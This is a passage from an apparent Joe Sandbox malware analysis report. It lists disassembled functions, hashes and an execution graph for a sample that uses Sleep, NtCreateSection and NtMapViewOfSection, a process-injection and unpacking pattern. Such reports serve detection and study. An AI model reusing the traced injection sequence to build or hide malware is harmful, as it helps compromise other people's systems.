                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040AEA9,?,?,00000000), ref: 0040DB25
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900417378.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 1ab4e90e3bf2085b5c19cb3079ae7fb3a0f3e77fe013268dfdebb13dc2d63100
                                                                      • Instruction ID: 89ae16cb865302e8bc47b642ae2bc1fc27565457d2be399f30c09226411e951d
                                                                      • Opcode Fuzzy Hash: 1ab4e90e3bf2085b5c19cb3079ae7fb3a0f3e77fe013268dfdebb13dc2d63100
                                                                      • Instruction Fuzzy Hash: 2401B135B002159AEB289FA5DC04B6737B4EB857A4F06453AA915AB2D0D73CE814CA98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040A9D8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 418 40a9d8-40a9e7 420 40a9e9-40a9ec 418->420 421 40a9ed-40a9f0 418->421 422 40aa02-40aa0a call 40ae4e 421->422 423 40a9f2-40a9f8 421->423 426 40aa0f-40aa14 422->426 423->423 424 40a9fa-40aa00 423->424 424->422 424->423 427 40aa23-40aa2e call 40b520 426->427 428 40aa16-40aa22 426->428 427->428
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900417378.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                      Similarity
                                                                      • API ID: __malloc_crt
                                                                      • String ID:
                                                                      • API String ID: 3464615804-0
                                                                      • Opcode ID: 1ac1e0c22a827e4eb3afa572b7ce0305a9c31c80a6fabd8f886b3d2083b26de1
                                                                      • Instruction ID: 6c009c41319a7d8d7d2ff0ff75bb1fb8a32a163ed955803d9688be5ede57aee7
                                                                      • Opcode Fuzzy Hash: 1ac1e0c22a827e4eb3afa572b7ce0305a9c31c80a6fabd8f886b3d2083b26de1
                                                                      • Instruction Fuzzy Hash: 4AF0E9777012106ACB306734BC498975668DAD632430B8437F401E32C0F6388D91C7AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040A3F8 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 432 40a3f8-40a415 HeapCreate
                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040A401
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900417378.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: 49a7b99272e7dfb1a34acc57a7128d62bad4503410a37b1f68c0455ac866e0bf
                                                                      • Instruction ID: 7b2594a50018b71bddf63201193a1d411e4c34ecc50922a49ca2bed2e99e9dfa
                                                                      • Opcode Fuzzy Hash: 49a7b99272e7dfb1a34acc57a7128d62bad4503410a37b1f68c0455ac866e0bf
                                                                      • Instruction Fuzzy Hash: A6C092B47953426BE7588B39AD26B8929E49B0DB43F204079B307ED9E0DAB195609F08
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018C9 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 433 4018c9-40192e call 401186 Sleep call 4013fb 447 401930-401938 call 4014f4 433->447 448 40193d-401986 call 401186 433->448 447->448
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                      • Instruction ID: e62ef0a5377d8aa3a211eebfa9e1192b8d220afb4109f2d02ab252a4e2d2aae2
                                                                      • Opcode Fuzzy Hash: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                      • Instruction Fuzzy Hash: CA118EB220C305FADB006A949C91EBA36689B11714F308137BB53790F1A57C9653F76F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018E5 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 462 4018e5-40192e call 401186 Sleep call 4013fb 476 401930-401938 call 4014f4 462->476 477 40193d-401986 call 401186 462->477 476->477
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                      • Instruction ID: 05c04d2ad09f16b9b87c287c864bc9b7ec61e89fae5dcaecab9d0654b7c4e063
                                                                      • Opcode Fuzzy Hash: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                      • Instruction Fuzzy Hash: BB015BB220C305EADB006A949D62EB932649B15715F308137BA53790F1957C8653F61B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018D4 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 491 4018d4-40192e call 401186 Sleep call 4013fb 503 401930-401938 call 4014f4 491->503 504 40193d-401986 call 401186 491->504 503->504
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                      • Instruction ID: fce81954366252da7adbbdf3d64cc03e59f8ef64e68a90b3f3f5323062df9ebf
                                                                      • Opcode Fuzzy Hash: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                      • Instruction Fuzzy Hash: FF016DB220C305EADB006A949C61EAA37645B51715F348137BA53B90F1D57C8653F62B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 518 4018f4-40192e call 401186 Sleep call 4013fb 529 401930-401938 call 4014f4 518->529 530 40193d-401986 call 401186 518->530 529->530
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                      • Instruction ID: 61556fbd74693c1122d25878dabab91872ca5c85c54c0931cf2d8ffcbe0fb9f5
                                                                      • Opcode Fuzzy Hash: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                      • Instruction Fuzzy Hash: 5A0178B2248306FADB006AA49CA1EB932249B55715F308137FB13B90F1D57C8653F72B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018E9 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 544 4018e9-40192e call 401186 Sleep call 4013fb 553 401930-401938 call 4014f4 544->553 554 40193d-401986 call 401186 544->554 553->554
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                      • Instruction ID: 0cfdbf57c40ebd16915b75e0bcaa31018d6035999b4c8e4d4561116cd1d9419c
                                                                      • Opcode Fuzzy Hash: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                      • Instruction Fuzzy Hash: FA017CB2208305FADB006AA09C61EA937649B55715F30813BFA53780F1957D8653F62B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018FC Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 568 4018fc-40192e call 401186 Sleep call 4013fb 575 401930-401938 call 4014f4 568->575 576 40193d-401986 call 401186 568->576 575->576
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                      • Instruction ID: 8924cd936244c1d255e5b8ad3bd9668b31b5227b00448509fbcd462ac300149e
                                                                      • Opcode Fuzzy Hash: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                      • Instruction Fuzzy Hash: 9A018FB2208305BBDF006AE08C62EA93B645F15315F244477FA53B91F2D57C9A52E72B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 004012AA Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O$u
                                                                      • API String ID: 0-1426094074
                                                                      • Opcode ID: 70f08006886caaf092c5829f33f11fb51f64c9d12048d00267c95fac2347aa9f
                                                                      • Instruction ID: ec081fa5312fe6fc4e52d732a61ad1849d70c5eb2d1ef5a03c42e236a8c7c1f6
                                                                      • Opcode Fuzzy Hash: 70f08006886caaf092c5829f33f11fb51f64c9d12048d00267c95fac2347aa9f
                                                                      • Instruction Fuzzy Hash: 60515A71948391EBC712CF25C895AA67FB4FF5232472442FFD991BA1F2C2394102DB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004012B4 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O$u
                                                                      • API String ID: 0-1426094074
                                                                      • Opcode ID: 60829e25b52dc9c286bcfc8c1594e64d5fadf153f3335295984f2997cccd9bdc
                                                                      • Instruction ID: 940fbc0dab850d529529b346cdf795a2ab2b5bab9bf26de1e63129e490b6217b
                                                                      • Opcode Fuzzy Hash: 60829e25b52dc9c286bcfc8c1594e64d5fadf153f3335295984f2997cccd9bdc
                                                                      • Instruction Fuzzy Hash: 4D514A71808391EFCB12DF35C8956967FB4EE5232472842EFD8A1AA1F3C3394102DB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004012DC Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O$u
                                                                      • API String ID: 0-1426094074
                                                                      • Opcode ID: 00f0e6f876bcc7b1bde4355ec0cdb43d68c41d3e4076bba62f9fb807bd46335b
                                                                      • Instruction ID: 186db2605b7e3a4196eee0c3335ff4411e0107172b2e21921e8dcdeaea740e4f
                                                                      • Opcode Fuzzy Hash: 00f0e6f876bcc7b1bde4355ec0cdb43d68c41d3e4076bba62f9fb807bd46335b
                                                                      • Instruction Fuzzy Hash: 6F415972848391EFCB12DF25C8956967FB4EF5232472842AFD8A1AA1F3C3354102CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004012EC Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O$u
                                                                      • API String ID: 0-1426094074
                                                                      • Opcode ID: 9e7b9b215a69e610e90231314c889fa282a587561654e2ad738d2177744eceed
                                                                      • Instruction ID: a91aca37e3be38c6bdcdb449f9ae7727b8e4dd8904d1e33b629b6c30361965f1
                                                                      • Opcode Fuzzy Hash: 9e7b9b215a69e610e90231314c889fa282a587561654e2ad738d2177744eceed
                                                                      • Instruction Fuzzy Hash: 85415B71848391DFCB12DF25D8956967FB4EE5232472842FFD8A1AA1F2C3354102CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004013BA Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: S
                                                                      • API String ID: 0-543223747
                                                                      • Opcode ID: 60d6db45c57815d0079f1bd1d5223eed9f74a2ff5f50d055cc682c7432e8ea62
                                                                      • Instruction ID: 27aef00ba30489353df1a889fec71363b64b2bbfe6ab54d13b431a78e03c28fc
                                                                      • Opcode Fuzzy Hash: 60d6db45c57815d0079f1bd1d5223eed9f74a2ff5f50d055cc682c7432e8ea62
                                                                      • Instruction Fuzzy Hash: 60416E72948395DFCB128F39D895596BFB4EE5333932842BFD491AA1F3C2384501CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004014D8 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a4c5a06ffa398a92e74a522d908d178b9cb7e63d2e0450eb74668c0348f2fa4
                                                                      • Instruction ID: c22b5d678712e874c3708b01174fb826adcc151eb3839776fd57d9632e2febbf
                                                                      • Opcode Fuzzy Hash: 7a4c5a06ffa398a92e74a522d908d178b9cb7e63d2e0450eb74668c0348f2fa4
                                                                      • Instruction Fuzzy Hash: BD31AE77D156808BCB028B35985259B7FB0DE5333535946EBC491A61F2C3388606C7A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004013FB Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b1f0159f97d466bc91f5776e0bc3e363edbf1d05b17888ab0c7daa3a3c8438c
                                                                      • Instruction ID: 9e55921de2574c657f41f34ef6731c0788b7729c1e8725f62aa53682a3b93476
                                                                      • Opcode Fuzzy Hash: 4b1f0159f97d466bc91f5776e0bc3e363edbf1d05b17888ab0c7daa3a3c8438c
                                                                      • Instruction Fuzzy Hash: 78217C75D48345DBCB129E25D8516E73FA4EF9233576402BBE4826A0F2C2384606DBBF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401406 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ca2780711d82aa462e2c3337fc74dd66a5598a0a40ee9b3fd7cead32aae73b3
                                                                      • Instruction ID: 769907c8ee4e2f7cf64fba8ba9f8b23e145ea64c519f6a614380a457a23c39ea
                                                                      • Opcode Fuzzy Hash: 1ca2780711d82aa462e2c3337fc74dd66a5598a0a40ee9b3fd7cead32aae73b3
                                                                      • Instruction Fuzzy Hash: 31219B75D48285DBCB128E25D4506D73FA4EF9233576442BBD0826A0F2C3340602DBAF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401413 Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d2a1cf2239d74f103a93650217df68cbc67bafc0d100bb7a7d4b38e3cea7e99
                                                                      • Instruction ID: ad73ea8454fe0e189ec9174c773bae34e5c54e3eefe866846b87b01581482766
                                                                      • Opcode Fuzzy Hash: 8d2a1cf2239d74f103a93650217df68cbc67bafc0d100bb7a7d4b38e3cea7e99
                                                                      • Instruction Fuzzy Hash: 68219776D49385DBCF128F26D8922973FB4EE5333535842EBC4929A0B2C2348601CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004026CB Relevance: .0, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c38bdd1c28fa4a2a68309ed83fed7e39b7daf74b08187679615121f3cc341f75
                                                                      • Instruction ID: cdd58dca2a837a008a946bbb35dbe0173230e547b11635f62ab1d195229df534
                                                                      • Opcode Fuzzy Hash: c38bdd1c28fa4a2a68309ed83fed7e39b7daf74b08187679615121f3cc341f75
                                                                      • Instruction Fuzzy Hash: F1014C77704F608ADB038B91E596488BFB0EE022213144AC2C1E05A5EBEB616233C386
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402698 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9deb172eac83e21007a7a8ecff873d1541951d12bcb9617cba21bb9c86776f0e
                                                                      • Instruction ID: 962708b40ab39c170d01331d4ad521e2ade48b8f21a1479749b60a6d9d7c7a73
                                                                      • Opcode Fuzzy Hash: 9deb172eac83e21007a7a8ecff873d1541951d12bcb9617cba21bb9c86776f0e
                                                                      • Instruction Fuzzy Hash: C3E0C2B9501F10C5A72A8FA2DAA7D88BFB4FA453113025CC4C4904F8BAEF22F131D755
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040E5F4 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900417378.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction ID: fd7403959e30d510bea130438df6ce884a441a3e606f3a8fbb41e365420ffc10
                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction Fuzzy Hash: 2711877200014DBBCF125E95DC01CEE3F22BB28354F588C26FA5864171C33BD971AB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:4.4%
                                                                      Dynamic/Decrypted Code Coverage:75.5%
                                                                      Signature Coverage:5.5%
                                                                      Total number of Nodes:110
                                                                      Total number of Limit Nodes:7
                                                                      execution_graph 7756 402e41 7758 402e3a 7756->7758 7759 402ece 7758->7759 7760 4018c9 7758->7760 7761 4018d8 7760->7761 7762 401911 Sleep 7761->7762 7767 4013fb 7762->7767 7764 40192c 7766 40193d 7764->7766 7779 4014f4 7764->7779 7766->7759 7769 401404 7767->7769 7768 4013f2 7768->7764 7769->7768 7770 4015a9 NtDuplicateObject 7769->7770 7770->7768 7771 4015c6 NtCreateSection 7770->7771 7772 401646 NtCreateSection 7771->7772 7773 4015ec NtMapViewOfSection 7771->7773 7772->7768 7774 401672 7772->7774 7773->7772 7775 40160f NtMapViewOfSection 7773->7775 7774->7768 7776 40167c NtMapViewOfSection 7774->7776 7775->7772 7777 40162d 7775->7777 7776->7768 7778 4016a3 NtMapViewOfSection 7776->7778 7777->7772 7778->7768 7780 401503 7779->7780 7781 4015a9 NtDuplicateObject 7780->7781 7789 4016c5 7780->7789 7782 4015c6 NtCreateSection 7781->7782 7781->7789 7783 401646 NtCreateSection 7782->7783 7784 4015ec NtMapViewOfSection 7782->7784 7785 401672 7783->7785 7783->7789 7784->7783 7786 40160f NtMapViewOfSection 7784->7786 7787 40167c NtMapViewOfSection 7785->7787 7785->7789 7786->7783 7788 40162d 7786->7788 7787->7789 7790 4016a3 NtMapViewOfSection 7787->7790 7788->7783 7789->7766 7790->7789 7968 401501 7969 40152d 7968->7969 7970 4015a9 NtDuplicateObject 7969->7970 7979 4016c5 7969->7979 7971 4015c6 NtCreateSection 7970->7971 7970->7979 7972 401646 NtCreateSection 7971->7972 7973 4015ec NtMapViewOfSection 7971->7973 7974 401672 7972->7974 7972->7979 7973->7972 7975 40160f NtMapViewOfSection 7973->7975 7976 40167c NtMapViewOfSection 7974->7976 7974->7979 7975->7972 7977 40162d 7975->7977 7978 4016a3 NtMapViewOfSection 7976->7978 7976->7979 7977->7972 7978->7979 7845 402e07 7846 402e17 7845->7846 7847 4018c9 15 API calls 7846->7847 7848 402ece 7846->7848 7847->7848 7791 424310 7792 424327 7791->7792 7795 423c30 7792->7795 7794 4245d8 7797 423c56 __write_nolock 7795->7797 7796 423dfb LocalAlloc 7802 423e19 7796->7802 7797->7796 7798 424173 VirtualProtect 7799 42419a 7798->7799 7800 4241d2 LoadLibraryW 7799->7800 7801 42425c 7800->7801 7801->7794 7802->7798 7869 4018d4 7870 4018ea 7869->7870 7871 401911 Sleep 7870->7871 7872 4013fb 7 API calls 7871->7872 7873 40192c 7872->7873 7874 4014f4 7 API calls 7873->7874 7875 40193d 7873->7875 7874->7875 7932 4012aa 7933 4012b9 7932->7933 7934 4015a9 NtDuplicateObject 7933->7934 7942 4013f2 7933->7942 7935 4015c6 NtCreateSection 7934->7935 7934->7942 7936 401646 NtCreateSection 7935->7936 7937 4015ec NtMapViewOfSection 7935->7937 7938 401672 7936->7938 7936->7942 7937->7936 7939 40160f NtMapViewOfSection 7937->7939 7940 40167c NtMapViewOfSection 7938->7940 7938->7942 7939->7936 7941 40162d 7939->7941 7940->7942 7943 4016a3 NtMapViewOfSection 7940->7943 7941->7936 7943->7942 7818 25cb0f7 7819 25cb106 7818->7819 7822 25cb897 7819->7822 7823 25cb8b2 7822->7823 7824 25cb8bb CreateToolhelp32Snapshot 7823->7824 7825 25cb8d7 Module32First 7823->7825 7824->7823 7824->7825 7826 25cb8e6 7825->7826 7828 25cb10f 7825->7828 7829 25cb556 7826->7829 7830 25cb581 7829->7830 7831 25cb5ca 7830->7831 7832 25cb592 VirtualAlloc 7830->7832 7831->7831 7832->7831 8004 4091ec 8005 40ae93 __calloc_crt RtlAllocateHeap 8004->8005 8006 4091f8 8005->8006 7803 